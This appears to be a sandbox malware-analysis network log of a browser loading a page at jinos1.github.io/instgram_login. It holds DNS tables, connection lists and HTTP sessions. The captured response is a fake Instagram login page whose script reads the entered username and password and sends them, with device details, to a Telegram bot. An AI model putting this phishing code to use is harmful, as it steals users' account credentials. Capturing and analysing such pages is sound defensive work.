                    Jan 14, 2025 01:38:02.287367105 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.287657022 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.287657022 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.287694931 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.387607098 CET44349722185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.387676954 CET44349722185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.387770891 CET44349722185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.387797117 CET49722443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.388660908 CET49722443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.393585920 CET49722443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.393601894 CET44349722185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.795361042 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.799539089 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.799557924 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.800076008 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.806715965 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.806765079 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.806797981 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.855549097 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.906357050 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.906419992 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.906482935 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.906557083 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:02.906719923 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.908556938 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:02.908556938 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:03.212810040 CET49723443192.168.2.5185.199.110.153
                    Jan 14, 2025 01:38:03.212835073 CET44349723185.199.110.153192.168.2.5
                    Jan 14, 2025 01:38:08.865665913 CET44349712216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:08.865737915 CET44349712216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:08.865818977 CET49712443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:10.153676987 CET49712443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:10.153697968 CET44349712216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:44.041284084 CET4971480192.168.2.5185.199.108.153
                    Jan 14, 2025 01:38:44.047214031 CET8049714185.199.108.153192.168.2.5
                    Jan 14, 2025 01:38:44.525455952 CET4971580192.168.2.5185.199.108.153
                    Jan 14, 2025 01:38:44.531050920 CET8049715185.199.108.153192.168.2.5
                    Jan 14, 2025 01:38:58.339333057 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:58.339432001 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:58.339553118 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:58.339785099 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:58.339808941 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:58.973623991 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:58.973998070 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:58.974026918 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:58.974694014 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:58.975023031 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:38:58.975169897 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:38:59.025243998 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:39:00.153042078 CET4971480192.168.2.5185.199.108.153
                    Jan 14, 2025 01:39:00.158396006 CET8049714185.199.108.153192.168.2.5
                    Jan 14, 2025 01:39:00.158485889 CET4971480192.168.2.5185.199.108.153
                    Jan 14, 2025 01:39:08.903062105 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:39:08.903146029 CET44349997216.58.206.36192.168.2.5
                    Jan 14, 2025 01:39:08.903211117 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:39:10.151910067 CET49997443192.168.2.5216.58.206.36
                    Jan 14, 2025 01:39:10.151932955 CET44349997216.58.206.36192.168.2.5
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2025 01:37:53.981398106 CET53536031.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:54.013461113 CET53566861.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:55.129129887 CET53517671.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:58.277479887 CET5340353192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:58.277612925 CET6396353192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:58.284208059 CET53534031.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:58.284394979 CET53639631.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:59.023149967 CET5170153192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:59.023528099 CET5818853192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:59.031630993 CET53517011.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:59.032103062 CET53581881.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:59.520533085 CET6496353192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:59.520894051 CET5346853192.168.2.51.1.1.1
                    Jan 14, 2025 01:37:59.528700113 CET53649631.1.1.1192.168.2.5
                    Jan 14, 2025 01:37:59.529458046 CET53534681.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:01.012588978 CET53558441.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:01.689930916 CET5278753192.168.2.51.1.1.1
                    Jan 14, 2025 01:38:01.690314054 CET5979353192.168.2.51.1.1.1
                    Jan 14, 2025 01:38:01.699116945 CET53597931.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:01.699244976 CET53527871.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:12.284492016 CET53509231.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:30.994461060 CET53529481.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:53.597788095 CET53625321.1.1.1192.168.2.5
                    Jan 14, 2025 01:38:54.002779007 CET53649911.1.1.1192.168.2.5
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 14, 2025 01:37:58.277479887 CET192.168.2.51.1.1.10x61aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:58.277612925 CET192.168.2.51.1.1.10x253dStandard query (0)www.google.com65IN (0x0001)false
                    Jan 14, 2025 01:37:59.023149967 CET192.168.2.51.1.1.10x2156Standard query (0)jinos1.github.ioA (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.023528099 CET192.168.2.51.1.1.10x45b4Standard query (0)jinos1.github.io65IN (0x0001)false
                    Jan 14, 2025 01:37:59.520533085 CET192.168.2.51.1.1.10x798bStandard query (0)jinos1.github.ioA (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.520894051 CET192.168.2.51.1.1.10x4e3eStandard query (0)jinos1.github.io65IN (0x0001)false
                    Jan 14, 2025 01:38:01.689930916 CET192.168.2.51.1.1.10x5f0fStandard query (0)jinos1.github.ioA (IP address)IN (0x0001)false
                    Jan 14, 2025 01:38:01.690314054 CET192.168.2.51.1.1.10xf41eStandard query (0)jinos1.github.io65IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 14, 2025 01:37:58.284208059 CET1.1.1.1192.168.2.50x61aNo error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:58.284394979 CET1.1.1.1192.168.2.50x253dNo error (0)www.google.com65IN (0x0001)false
                    Jan 14, 2025 01:37:59.031630993 CET1.1.1.1192.168.2.50x2156No error (0)jinos1.github.io185.199.108.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.031630993 CET1.1.1.1192.168.2.50x2156No error (0)jinos1.github.io185.199.109.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.031630993 CET1.1.1.1192.168.2.50x2156No error (0)jinos1.github.io185.199.110.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.031630993 CET1.1.1.1192.168.2.50x2156No error (0)jinos1.github.io185.199.111.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.528700113 CET1.1.1.1192.168.2.50x798bNo error (0)jinos1.github.io185.199.108.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.528700113 CET1.1.1.1192.168.2.50x798bNo error (0)jinos1.github.io185.199.109.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.528700113 CET1.1.1.1192.168.2.50x798bNo error (0)jinos1.github.io185.199.110.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:37:59.528700113 CET1.1.1.1192.168.2.50x798bNo error (0)jinos1.github.io185.199.111.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:38:01.699244976 CET1.1.1.1192.168.2.50x5f0fNo error (0)jinos1.github.io185.199.110.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:38:01.699244976 CET1.1.1.1192.168.2.50x5f0fNo error (0)jinos1.github.io185.199.108.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:38:01.699244976 CET1.1.1.1192.168.2.50x5f0fNo error (0)jinos1.github.io185.199.109.153A (IP address)IN (0x0001)false
                    Jan 14, 2025 01:38:01.699244976 CET1.1.1.1192.168.2.50x5f0fNo error (0)jinos1.github.io185.199.111.153A (IP address)IN (0x0001)false
                    • jinos1.github.io
                    • https:
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549715185.199.108.153803524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    Jan 14, 2025 01:37:59.043365002 CET445OUTGET /instgram_login HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate
                    Accept-Language: en-US,en;q=0.9
                    Jan 14, 2025 01:37:59.514204025 CET715INHTTP/1.1 301 Moved Permanently
                    Connection: keep-alive
                    Content-Length: 162
                    Server: GitHub.com
                    Content-Type: text/html
                    permissions-policy: interest-cohort=()
                    Location: https://jinos1.github.io/instgram_login
                    X-GitHub-Request-Id: 718A:2570AA:352B4A:3B2DD1:6785B1E7
                    Accept-Ranges: bytes
                    Age: 0
                    Date: Tue, 14 Jan 2025 00:37:59 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-ewr-kewr1740066-EWR
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1736815079.458461,VS0,VE13
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: c296d85f062f81321d9031120addafe963a3a069
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                    Jan 14, 2025 01:38:44.525455952 CET6OUTData Raw: 00
                    Data Ascii:


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549714185.199.108.153803524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    Jan 14, 2025 01:38:44.041284084 CET6OUTData Raw: 00
                    Data Ascii:


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549716185.199.108.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:00 UTC673OUTGET /instgram_login HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:00 UTC549INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    Content-Length: 162
                    Server: GitHub.com
                    Content-Type: text/html
                    permissions-policy: interest-cohort=()
                    Location: https://jinos1.github.io/instgram_login/
                    X-GitHub-Request-Id: F48A:31A414:33B902:381ABF:6785B1E4
                    Accept-Ranges: bytes
                    Age: 0
                    Date: Tue, 14 Jan 2025 00:38:00 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-nyc-kteb1890078-NYC
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1736815080.090785,VS0,VE13
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: a78b94787e355ed0d9b8cd6af20478a1c69deb2a
                    2025-01-14 00:38:00 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549718185.199.108.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:00 UTC674OUTGET /instgram_login/ HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:00 UTC733INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 8662
                    Server: GitHub.com
                    Content-Type: text/html; charset=utf-8
                    permissions-policy: interest-cohort=()
                    Last-Modified: Sun, 12 Jan 2025 13:57:20 GMT
                    Access-Control-Allow-Origin: *
                    Strict-Transport-Security: max-age=31556952
                    ETag: "6783ca40-21d6"
                    expires: Tue, 14 Jan 2025 00:48:00 GMT
                    Cache-Control: max-age=600
                    x-proxy-cache: MISS
                    X-GitHub-Request-Id: B57F:1F7C8F:372AB9:3D2D18:6785B1E8
                    Accept-Ranges: bytes
                    Age: 0
                    Date: Tue, 14 Jan 2025 00:38:00 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-ewr-kewr1740046-EWR
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1736815081.851192,VS0,VE16
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: 7cf50c05408b6a82de41f3e5ab676a1fc7d54540
                    2025-01-14 00:38:00 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6e 73 74 61 2d 66 61 76 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 72
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="icon" href="insta-fav.ico" /> <title>Instagram</title></head><body> <style>* { bor
                    2025-01-14 00:38:00 UTC1378INData Raw: 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 7d 0a 0a 2f 2a 2a 0a 20 2a 0a 20 2a 2f 0a 0a 2e 70 61 6e 65 6c 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 62 64 62 64 62 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 23 61 75 74 68 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 35 30 70 78 3b 20 7d 0a 23 6d 6f 62 69 6c 65 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 34 35 34 70 78 3b 20 7d 0a 0a 23 6d 6f 62 69 6c 65 20 69 6d 67 20 7b 0a 20 20 20 20
                    Data Ascii: -ms-flex-wrap: wrap; flex-wrap: wrap;}/** * */.panel { background-color: white; border: 1px solid #dbdbdb; margin-bottom: 10px; padding: 10px;}#auth { max-width: 350px; }#mobile { max-width: 454px; }#mobile img {
                    2025-01-14 00:38:00 UTC1378INData Raw: 20 61 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 20 7d 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 20 64 69 76 20 61 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 20 64 69 76 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 7d 0a 0a 2f 2a 2a 0a 20 2a 20 52 65 67 69 73 74 65 72 20 73 65 63 74 69 6f 6e 0a 20 2a 2f 0a 2e 72 65 67 69 73 74 65 72 20 2a 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 7d 0a 2e 72 65 67 69 73 74 65 72 20 61 20 7b 20 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 39 35 66 36 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 0a 2e 72 65 67 69 73 74 65 72 20 70 20 7b 20 6d 61 72 67 69 6e
                    Data Ascii: a { font-size: 12px; }.login-with-fb div a { font-weight: bold; }.login-with-fb div { margin-bottom: 15px; }/** * Register section */.register * { font-size: 14px; }.register a { color: #0095f6; font-weight: bold;}.register p { margin
                    2025-01-14 00:38:00 UTC1378INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 2d 66 6f 72 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 65 6d 61 69 6c 50 68 6f 6e 65 22 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 68 6f 6e 65 2c 20 75 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 65 6d 61 69 6c 50 68 6f 6e 65 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 50 68 6f 6e 65 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 68 6f 6e 65 2c 20 75 73 65 72 6e 61 6d
                    Data Ascii: </h1> <form id="login-form"> <label for="emailPhone" class="sr-only">Phone, username or email</label> <input id="emailPhone" name="emailPhone" placeholder="Phone, usernam
                    2025-01-14 00:38:00 UTC1378INData Raw: 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 45 4c 50 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 52 45 53 53 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 41 50 49 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 43 41 52 45 45 52 53 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 52 49 56 41 43 59 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 54 45 52 4d 53
                    Data Ascii: </li> <li><a href="#">HELP</a></li> <li><a href="#">PRESS</a></li> <li><a href="#">API</a></li> <li><a href="#">CAREERS</a></li> <li><a href="#">PRIVACY</a></li> <li><a href="#">TERMS
                    2025-01-14 00:38:00 UTC1378INData Raw: 6e 61 62 6c 65 64 3a 20 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 73 65 6e 64 20 63 6f 6c 6c 65 63 74 65 64 20 64 61 74 61 20 74 6f 20 54 65 6c 65 67 72 61 6d 0a 20 20 20 20 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 54 6f 54 65 6c 65 67 72 61 6d 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 64 65 76 69 63 65 49 6e 66 6f 20 3d 20 61 77 61 69 74 20 67 65 74 44 65 76 69 63 65 49 6e 66 6f 28 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 74 6f 6b 65 6e 20 3d 20 27 37 36 38 37 34 38 34 32 36 39 3a 41 41 45
                    Data Ascii: nabled: navigator.cookieEnabled }; } // Function to send collected data to Telegram async function sendToTelegram(data) { const deviceInfo = await getDeviceInfo(); const token = '7687484269:AAE
                    2025-01-14 00:38:00 UTC394INData Raw: 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 20 20 2f 2f 20 50 72 65 76 65 6e 74 20 66 6f 72 6d 20 73 75 62 6d 69 73 73 69 6f 6e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 47 65 74 20 66 6f 72 6d 20 64 61 74 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 61 69 6c 50 68 6f 6e 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 65 6d 61 69 6c 50 68 6f 6e 65 27 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 70 61 73 73 77 6f 72 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 61 73 73 77 6f 72 64 27 29 2e 76 61 6c 75 65 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 53 65 6e 64 20 74 68 65 20 66 6f
                    Data Ascii: ent.preventDefault(); // Prevent form submission // Get form data const emailPhone = document.getElementById('emailPhone').value; const password = document.getElementById('password').value; // Send the fo


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.549719185.199.108.1534433524C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 00:38:01 UTC625OUTGET /instgram_login/instagram-logo.png HTTP/1.1
                    Host: jinos1.github.io
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://jinos1.github.io/instgram_login/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2025-01-14 00:38:01 UTC717INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 3841
                    Server: GitHub.com
                    Content-Type: image/png
                    permissions-policy: interest-cohort=()
                    Last-Modified: Sun, 12 Jan 2025 13:57:20 GMT
                    Access-Control-Allow-Origin: *
                    Strict-Transport-Security: max-age=31556952
                    ETag: "6783ca40-f01"
                    expires: Tue, 14 Jan 2025 00:48:01 GMT
                    Cache-Control: max-age=600
                    x-proxy-cache: MISS
                    X-GitHub-Request-Id: B8B6:29FFED:371F50:3D223B:6785B1E9
                    Accept-Ranges: bytes
                    Age: 0
                    Date: Tue, 14 Jan 2025 00:38:01 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-ewr-kewr1740057-EWR
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1736815082.558315,VS0,VE20
                    Vary: Accept-Encoding
                    X-Fastly-Request-ID: e827f511736769b528a5749ed5c08a1f24d4a2fd
